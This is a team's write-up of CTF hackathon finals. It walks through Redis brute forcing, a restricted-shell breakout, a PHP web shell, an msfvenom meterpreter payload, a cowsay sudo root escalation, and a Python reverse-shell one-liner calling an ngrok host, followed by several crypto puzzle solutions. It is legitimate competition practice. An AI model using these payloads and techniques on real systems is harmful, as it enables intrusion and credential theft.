Overview Of The CTF
As part of the 2021 Cybersecurity Conference, the American Business Council Nigeria (ABC Nigeria) was Organized by NaijaSecForce in partnership with Private Sector partners are hosting a Cybersecurity Hackathon. The objective of the hackathon is to highlight the capacity in the space and show the importance of implementing a cybersecurity framework in Nigeria.
The Hackathon will award innovators for displaying their level of expertise and skills in developing solutions to cyber challenges. A Cyber Award will be allocated in kind and will be distributed among the top three winners.
Cyber Awards will be awarded to the top three teams. Prices includes Laptops, Cybersecurity Certificates, Bootcamp for winners on Security in IBM Cloud, Cisco Certified CyberOps Associate Certifications for the Team Captains and Merchandise. The Award is sponsored by Cisco, IBM, Comercio and American Business Council.
Cybersecurity Hackathon Competition Finals Write Up By RedTeamNG
Damn man am so excited when working on the write up like man all the challenges are pretty cool come on Muzec just get started already lol.
WYSIWYG - 700 Point
Man I Keep Saying It We Always Start With An Nmap Scan.
muz3c@RedTeamNG:/$ nmap -sC -Pn -sV -p- 193.37.212.211 -T4
Starting Nmap 7.70 ( https://nmap.org ) at 2021-08-26 05:51 EDT
Stats: 0:01:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.69% done; ETC: 05:54 (0:01:41 remaining)
Nmap scan report for 193.37.212.211
Host is up (0.20s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
6379/tcp open redis Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.35 seconds
So we have some interesting ports 22 which is SSH and 6379 ahhh the mighty Redis port but no HTTP or HTTPS i mean port 80 or 443 man don’t google that up again lol just kidding man. I think we all know port ssh but before diving deep let look into the redis port.
What IS Redis
Redis is an in-memory data structure store, used as a distributed, in-memory key–value database, cache and message broker, with optional durability. Redis supports different kinds of abstract data structures, such as strings, lists, maps, sets, sorted sets, HyperLogLogs, bitmaps, streams, and spatial indices. which is always on port 6379 which can always change also probably for security reason man let just hack it feel free to check redis Documentation.
Redis Manual Enumeration
redis-cli -h 193.37.212.211
Seems anonymous logins is not allowed let try brute forcing with hydra.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ hydra -P /usr/share/wordlists/rockyou.txt 193.37.212.211 redis
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-26 08:05:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking redis://193.37.212.211:6379/
[6379][redis] host: 193.37.212.211 password: hotdog
[STATUS] 2964.00 tries/min, 2964 tries in 00:01h, 14341435 to do in 80:39h, 16 active
Ahhh nice we have the password now let log in redis again with the new credentials.
We are in typing info give us some more information about the databases and bla bla bla now let dump something using redis-dump .
redis-dump -u 193.37.212.211 -a hotdog > full.json
Avoid the wget bla bla bla i don’t know what the dude is trying to wget again in redis now we have the credentials let just crack the hash.
we have credentials for SSH now.
lowprivuser
passw0rd123
But let go back to the redis and try and read the databases manually.
SELECT 0
KEYS *
GET "lowprivuser"
Now back using SSH.
We are in let check the shell we have echo $SHELL .
Ahhh rbash restricted lol rudefish i will get you lol.
sudo -l but nothing let check how many users we have on the linux system first.
More users cool let go to the home directory but seems we are still restricted let break out of it.
Breaking Out With VI
vi
:set shell=/bin/sh
:shell
We have no access to abcctf folder now let find way to move our privilege
We have port 80 running locally and mysql port also dns port now let port forward using SSH.
ssh -L 8080:localhost:80 lowprivuser@193.37.212.211
Accessing localhost:8080
But i have no idea why am having problem using the SSH port fowarding let transfer it man i hate using Metasploit.
Generating Payload With Msfvenom
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=10969 -f elf > shell.elf
NOTE:- i will be using ngrok to recieve back connection actually it pretty cool you should try it.
Seems we have generate our payload and our listener is ready on msfconsole.
NOTE:- you need to transfer your payload to the target also to execute it.
Checking Our listener and boom a Meterpreter session 1 opened.
portfwd add -l 80 -p 80 -r 127.0.0.1
Port Forwarding i know you know.
Now accessing the webserver on our localhost.
Now let try and create account.
We are in.
Simple Image Gallery System 1.0 a quick google search and we know it vulnerable to SQL injection and RCE but seems we register a user let hit the RCE.
So i decided to upload a php command injection code on the profile picture page.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cat shell.php
<?php system ($_GET['cmd']) ?>
Boom we have command injection now let get a reverse shell.
Checking our Ncat listener back.
Now let spawn a tty shell.
python3 -c 'import pty; pty.spawn ("/bin/bash")'
Now let enumerate more on the target using linpeas.sh .
/var/www/html/gallery/initialize.php:if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"forthedubs");
/var/www/html/gallery/initialize.php:if(!defined('DB_USERNAME')) define('DB_USERNAME',"www-data");
Ahhh we have some credential for the database let try it on mysql.
We are in.
mysql> SELECT * from users;
SELECT * from users;
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+-------------------
--+---------------------+
| id | firstname | lastname | username | password | avatar | last_login | type | date_added
| date_updated |
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+-------------------
--+---------------------+
| 1 | Adminstrator | Admin | admin | 0192023a7bbd73250516f069df18b500 | uploads/1629675420_TagorbnpwmgzgrsorojLetta.php | NULL | 1 | 2021-01-20 14:02:3
7 | 2021-08-22 23:37:40 |
| 2 | Jane | Doe | abcctf | zburhWD2B7PqTx6sVfVszBE3KhgCqT | uploads/1624240500_avatar.png | NULL | 1 | 2021-01-20 14:02:3
7 | 2021-06-21 09:55:07 |
| 10 | rat | rat | rat | d285ed4b87f365a2273842b0208a60c8 | NULL | NULL | 0 | 2021-08-23 20:56:2
0 | NULL |
| 11 | bots | bots | bots | 2241bbfb8e26f6de627e38a1bbcdc9a9 | uploads/1629752160_webshell.php | NULL | 0 | 2021-08-23 20:56:3
3 | NULL |
| 12 | ratty | rattyu | ratty | d285ed4b87f365a2273842b0208a60c8 | uploads/1629752220_Capture.PNG | NULL | 0 | 2021-08-23 20:57:4
7 | NULL |
| 13 | bots | bots | bots | 21f1a6f87b2137da269ccb2e3030889a | uploads/1629752280_webshell.php | NULL | 0 | 2021-08-23 20:58:1
8 | NULL |
| 14 | bots | bots | bots | 21f1a6f87b2137da269ccb2e3030889a | uploads/1629752280_webshell.php | NULL | 0 | 2021-08-23 20:58:2
5 | NULL |
| 15 | ratty | ratty | ratty | 289462fcc025ce66f113ac73a13131cf | uploads/1629752400_God.png | NULL | 0 | 2021-08-23 21:00:5
8 | NULL |
| 16 | | | ratty | d285ed4b87f365a2273842b0208a60c8 | NULL | NULL | 0 | 2021-08-23 21:06:0
7 | NULL |
| 17 | Musa | saminu | muzec | bc05d7cbe414aa0f785d54525c2f822d | uploads/1629994260_shell.php | NULL | 0 | 2021-08-26 14:13:3
9 | 2021-08-26 16:11:48 |
| 18 | Musa | Saminu | muzec | bc05d7cbe414aa0f785d54525c2f822d | uploads/1629987780_muzec.png | NULL | 0 | 2021-08-26 14:23:1
0 | NULL |
+----+--------------+----------+----------+----------------------------------+-------------------------------------------------+------------+------+-------------------
I was able to dump some users credentials but the one that i found interesting is;
| 2 | Jane | Doe | abcctf | zburhWD2B7PqTx6sVfVszBE3KhgCqT | uploads/1624240500_avatar.png | NULL | 1 | 2021-01-20 14:02:3
We have abcctf running on the system also let try it using su abcctf with the password .
We are in hahhahahaha and also we can run sudo.
We have the first part of the flag now let root it.
ROOT
abcctf@vps:~$ sudo -l
Matching Defaults entries for abcctf on vps:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User abcctf may run the following commands on vps:
(root) /usr/games/cowsay
abcctf@vps:~$ TF=$(mktemp)
abcctf@vps:~$ echo 'exec "/bin/sh";' >$TF
abcctf@vps:~$ sudo /usr/games/cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
final_part.txt snap
# cat final_part.txt
Congratulations, you made it to the end. Herer is the remaining part of your flag.
0r_4re_clos3r_than_they_app34r}
# echo "Muzec is Here" > .root.txt
#
We are done fun right?? hahahahaha
Final Flag:- abcctf{0bjects_!n_the_Mirr0r_4re_clos3r_than_they_app34r}
Mr Obiora, the BEC victim - 500 point
Mr. Obiora Nurudeen - despite having attended multiple security awareness sessions - still loves to open unknown attachments regardless of the format. Try to get Mr. Obiora to run your malicious payload so you can access his PC. His email is obiora_nurudeen@ctf.ng.
What is his IP address?
Man it was way cool i actually solve it the unintended way cool right i know i love breaking things unintended way since we have the mail why not try sending a mail maybe will get a reply back.
SPAMMING
Muzec Saminu <redacted@gmail.com>
Aug 24, 2021, 4:34 AM (3 days ago)
to obiora_nurudeen
checking
I waited an hour before getting back a reply which is job well done lol.
Now let try getting the IP address.
Show original
Going through it and i was able to get Mr. Obiora IP address 185.177.59.120
Final Flag:- abcctf{185.177.59.120}
Easy Peasy - 100 point
Easy peasy to simple just like the name stated we have the URL to attack already let hit it.
A simple login page also a button to register which seems to be not working hahahaha let try some default credentials on the login page like admin/admin not luck admin/password but man i got nothing let try checking the source code.
Got nothing also let try to burst some directory with gobuster.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ gobuster dir -u http://185.203.119.50:4200/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://185.203.119.50:4200/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,pl,cgi,zip,txt,php,html,bak
[+] Timeout: 10s
===============================================================
2021/08/27 14:05:07 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 5277]
/dev (Status: 301) [Size: 321] [--> http://185.203.119.50:4200/dev/]
Some interesting develompent page let check it out.
Let hit the source code again.
Cool a hint let trying going down more.
Another hint i think let try decoding it using terminal.
We are down to <!-- var _0x26a3=["\x4A\x61\x56\x61\x53\x63\x52\x69\x50\x74\x5F\x69\x53\x5F\x66\x55\x6E"];console.PassCode(_0x26a3[0]) -->
Seems like hex to me let try using cyberchef.
JaVaScRiPt_iS_fUn
A flag nah i try it but no luck maybe it a password let dig more.
By the way, we have created a nice login page in PHP. Go find it out
Seems we know we are in the development page let burst the endpoint.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ gobuster dir -u http://185.203.119.50:4200/dev -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://185.203.119.50:4200/dev
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: bak,sh,pl,cgi,zip,txt,php,html
[+] Timeout: 10s
===============================================================
2021/08/27 14:14:02 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 526]
/login.php (Status: 200) [Size: 1654]
Boom i feel like a l33t hacker now lol we have the login page let try the password on it.
Password:- JaVaScRiPt_iS_fUn not to sure but let try it.
Ahhh it password but seems we need to try harder to get the flag lol let check the source page again.
But it a dead end maybe the image can help let wget it to our machine.
We have it now let check some metadata bla bla bla using exiftool .
Boom we got the flag page /ThE_FlAg_PaGe.html let hit it.
You made it champ, Here is your reward, the flag! and we got the flag.
Final Flag:- abcctf{H4cKiNG_i$_FuN_K33P_L34RN1NG}
Secret Keepers - The Beginning - 150 point
Let go of the burden, tell us your secrets we have the URL to pwned pwned sorry i mean attack let hit it.
Nice let look around we have some page let check the contact us page.
Sweet a flag page let check it out maybe it way simple lol.
We have a half flag damn Your flag is abcctf{l3t_ not that simple i guess back to the contact form.
A little hint;-
Ermm, send to rudefish, he might have something for you
We should have a cooke present let check it with cookie editor.
Nice sending to web-admin let intercept the request with burp and edit the cookie to rudefish .
Edit request below like the image.
Cookie: sendTo=rudefish
Now send let check our mail we should receive a mail from rudefish if it right.
Boom we have the complete flag now.
Final Flag:- abcctf{l3t_h4v3_your_secr375!}
Secret Keepers - Intermediate - 150 point
Now back to the rudefish mail.
One of my challenges is differentiating robots from humans. But since you are here, a human, I will let you in on a little secret.
User-Agent: *
Disallow: /115 101 99 114 101 116 45 99 111 110 116 114 111 108 45 99 101 110 116 101 114
Does that make sense? I hope so. See you at the other side.
Looking like deciaml code.
Nice am right we have a secret page cool secret-control-center let access it.
Admin Control Center cool we have the mail already rudefish@secretkeepers.abc but we are missing a password hahahaha nice brute forcing i guess let try creating a wordlist with cewl with the url.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cewl http://185.203.119.50:6500/home > abc.txt
But man it was generating rubbish so let try to extract the words solo.
Never
seek
to
tell
thy
love
Love
that
never
told
can
be
For
the
gentle
wind
does
move
Silently
invisibly
I
told
my
love
I
told
mylove
I
told
her
all
my
heart
Trembling
cold
in
ghastly
fears
Ah
she
doth
depart
Soon
as
she
was
gone
from
me
A
traveller
whistleblower
came
by
Silently
invisibly
O
was
no
deny
https
com
www
creative
tim
paper
kit
notice
and
Paper
Kit
Angular
Product
Page
product
angular
Copyright
Creative
Tim
Licensed
under
MIT
github
timcreative
blob
master
LICENSE
The
above
copyright
this
permission
shall
included
all
copies
substantial
portions
the
Software
Secret
Keepers
Fonts
icons
Save in a txt file now let intercept the login form and brute force the hell out of it.
Intercept with Burp.
Send to Intruder.
Now click on clear we only the password form to bruteforce.
Now let add it.
Now let click on the payloads.
Click on payloads options and load the wordlist after that let click on start attack.
When we have the right password the status and the length would be different.
We are in the password is whistleblower now let log in.
We are in man we are in awesome right let get the flag.
Final Flag:- abcctf{g00d_t0_se3_you_here_hum4n}
Secret Keepers - The End - 100 point
Seems we can execute some command let get a reverse shell.
Now let get a reverse shell using ngrok.
Ncat listener ready.
Reverse shell payload ready.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("2.tcp.ngrok.io",19733));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Checking our Ncat listener and we have shell.
Now hunting for the last flag i check the root folder i got nothing.
But seems we have a hidden git folder running let check it out.
Going through some commit and we have some leads and we have the last flag hahahaaha fun right??
Final Flag:- abcctf{remember_YoUr_s3cret_!s_safe_with_us}
All clear man i have fun let hit it.
Pinky and The mouse - 100 point
Let download the head.txt file.
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>---.+.+..+++++++++++++++++.--------------.+++++++++++++++++++++.<+++++++++++++.>------------------.++++.+++.----.<++++++.++++++.-----------------------------.>++++++.<--.>---------.+++++.---------------------.++++++++++++++++++++++++++++++++++++.
Definitely a Brainf*ck Code let hit it.
Final Flag:- abcctf{SimplY_Br@inY}
Gentle Reminder - 250 point
Never put sensitive things in your purse man let just download it.
011^0000^1011^011^00^0100^0100^1011^111^001^1000^0^0100^111^111^101^00^10^110^0010^111^010^011^0000^01^1^00^000^10^111^1^11^00^000^000^00^10^110^0^11^111^000^00011^011^01^1011^0100^0110^11^00^000^0^000^010^11111^11^0010^1^1010^1010^1000^01^01^11^111^10^110^11^00^000^000^00^10^110^1^0000^00^10^110^000^111^010^100^111^1011^111^001^10^111^1^101^10^111^011^1^0000^01^1^00^1^011^00^0100^0100^0100^0^01^100^1^111^1011^111^001^0100^111^111^101^00^10^110^1^111^111^100^0^0^0110^0100^1011^01^10^100^011^00^100^0^0100^1011^0010^111^010^011^0000^01^1^000^0000^111^001^0100^100^10^111^1^1000^0^000^111^001^110^0000^1^0010^111^010^00^10^1^0000^0^0100^01^10^100^111^0010^1^0000^0^110^01^11^0
I will call it a fu#king broken binary when not let fix it.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ cat binary.txt | tr '^' ' '
011 0000 1011 011 00 0100 0100 1011 111 001 1000 0 0100 111 111 101 00 10 110 0010 111 010 011 0000 01 1 00 000 10 111 1 11 00 000 000 00 10 110 0 11 111 000 00011 011 01 1011 0100 0110 11 00 000 0 000 010 11111 11 0010 1 1010 1010 1000 01 01 11 111 10 110 11 00 000 000 00 10 110 1 0000 00 10 110 000 111 010 100 111 1011 111 001 10 111 1 101 10 111 011 1 0000 01 1 00 1 011 00 0100 0100 0100 0 01 100 1 111 1011 111 001 0100 111 111 101 00 10 110 1 111 111 100 0 0 0110 0100 1011 01 10 100 011 00 100 0 0100 1011 0010 111 010 011 0000 01 1 000 0000 111 001 0100 100 10 111 1 1000 0 000 111 001 110 0000 1 0010 111 010 00 10 1 0000 0 0100 01 10 100 111 0010 1 0000 0 110 01 11 0
Cutting out ^ and also adding some space.
from __future__ import print_function
a = input("input the string:")
s = a.split(" ")
dict = {'01': 'A',
'1000': 'B',
'1010': 'C',
'100':'D',
'0':'E',
'0010':'F',
'110': 'G',
'0000': 'H',
'00': 'I',
'0111':'J',
'101': 'K',
'0100': 'L',
'11': 'M',
'10': 'N',
'111': 'O',
'0110': 'P',
'1101': 'Q',
'010': 'R',
'000': 'S',
'1': 'T',
'001': 'U',
'0001': 'V',
'011': 'W',
'1001': 'X',
'1011': 'Y',
'1100': 'Z',
'01111': '1',
'00111': '2',
'00011': '3',
'00001': '4',
'00000': '5',
'10000': '6',
'11000': '7',
'11100': '8',
'11110': '9',
'11111': '0',
'001100': '?',
'10010': '/',
'101101': '()',
'100001': '-',
'010101': '.',
'110011':',',
'011010':'@',
'111000':':',
'101010':':',
'10001':'=',
'011110':"'",
'101011':'!',
'001101':'_',
'010010':'"',
'10110':'(',
'1111011':'{',
'1111101':'}'
};
for item in s:
print (dict[item],end='')
Some really cool script to decode it.
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/ABC/ABCWriteup]
└─$ python3 crypto.py
input the string:011 0000 1011 011 00 0100 0100 1011 111 001 1000 0 0100 111 111 101 00 10 110 0010 111 010 011 0000 01 1 00 000 10 111 1 11 00 000 000 00 10 110 0 11 111 000 00011 011 01 1011 0100 0110 11 00 000 0 000 010 11111 11 0010 1 1010 1010 1000 01 01 11 111 10 110 11 00 000 000 00 10 110 1 0000 00 10 110 000 111 010 100 111 1011 111 001 10 111 1 101 10 111 011 1 0000 01 1 00 1 011 00 0100 0100 0100 0 01 100 1 111 1011 111 001 0100 111 111 101 00 10 110 1 111 111 100 0 0 0110 0100 1011 01 10 100 011 00 100 0 0100 1011 0010 111 010 011 0000 01 1 000 0000 111 001 0100 100 10 111 1 1000 0 000 111 001 110 0000 1 0010 111 010 00 10 1 0000 0 0100 01 10 100 111 0010 1 0000 0 110 01 11 0
WHYWILLYOUBELOOKINGFORWHATISNOTMISSINGEMOS3WAYLPMISESR0MFTCCBAAMONGMISSINGTHINGSORDOYOUNOTKNOWTHATITWILLLEADTOYOULOOKINGTOODEEPLYANDWIDELYFORWHATSHOULDNOTBESOUGHTFORINTHELANDOFTHEGAME
In clear format;
WHY WILL YOU BE LOOKING FOR WHAT IS NOT MISSING EMOS3WAYLPMISESR0MFTCCBA AMONG MISSING THINGS OR DO YOU NOT KNOW THAT IT WILL LEAD TO YOU LOOKING TOO DEEPLY AND WIDELY FOR WHAT SHOULD NOT BE SOUGHT FOR IN THE LAND OF THE GAME
A words is in reverse let fix that.
We have the flag since we know the format it should be easy.
Final Flag:- abcctf{m0rse_simply_aw3some}
No-brainer - 350 point
I wonder if they use their brains at all, or something else, man you talk to much let just hit it.
JsFuck it should be easy.
Decoding and we got return"aler\164\50a\142\143\143\164f\173\102r\100in\137\167\110\101\164s\137u\120\175\51" Definitely a javascript strings.
Final Flag:- abcctf{Br@in_wHAts_uP}
Read read Read - 500 point
Learning by books make sense
A docx file was given for this challenge, Given the word hint biblio (book) as the file name and the challenge title “read read read”, had me thinking it might have been a book cipher.
My first attempt was to actually view the document as is, in it’s .docx format. It turned out to be a one page document with multiple paragraphs whose content was basic, nothing special.
So if this was truely a book cipher as suspected, i knew i needed some sort of key(s) to crack it. A quick note is that docx files are actually zip archives with a bunch of XMLs and all the attached media. I decided to pass it straight into cyberchef for unzipping and further analysis.
With the help of cyberchef unzip tool, i was able to bake (extract) to reveal the underlying files which were xmls and rels files. Clicking through each file accordingly, i came across an interesting xml, “words/rel/rels.xml”. Interesting because it had a PNG signature.
I downloaded this file out of cyberchef’s results then converted and opened it to reveal a 15 rows and 3 column digits as shown below;
6 1 13
1 2 22
5 1 60
3 1 4
4 3 10
1 2 2
8 4 2
5 2 1
6 2 16
2 3 24
2 2 5
6 2 16
1 2 23
1 3 1
1 2 30
Alas! The keys!!
Next was to find out how this 3 parts keys fit into the book cipher as most book cipher consist majorly of 2 parts. But the major key here was making sure to have the word document opened in its original layout using office word ( software or online version) and not a text wrapping docx viewer in other to not mess up with the document line layout.
Since the docx had only 1 page, the first part of the key couldn’t be page number so i decided to take it as paragraph number as there are only 8 paragraphs in the text and the highest key digit in the first column was 8 which made it fit perfectly.
For the second key part, it had to translate to line number to give us the perfect position to apply the third key.
The Final key was a bit confusing as it could either mean words count to choose first letter or letter count. I decided after seeing the greatest value of 60 that no paragraph had up to 60 words on them and then opted for the second option of letter count starting from the line number gotten from the second key part to reveal;
6 1 13 --- c
1 2 22 --- 1
5 1 60 --- P
3 1 4 --- h
4 3 10 --- 3
1 2 2 --- r
8 4 2 --- f
5 2 1 ---R
6 2 16 ---0
2 3 24 ---m
2 2 5 --- b
6 2 16 --- 0
1 2 23 --- 0
1 3 1 --- k
1 2 30 ---5
Since we know the flag format it shoukd be easy.
Final Flag:- abcctf{c1Ph3r_fr0m_b00k5}
The Read read Read Crypto challenge was only solve by our redqueen AN3M0N1 feel free to connect with her on twitter with Kaka Sheidu or on Linkedln Kaka Sheidu .
Greeting From Muzec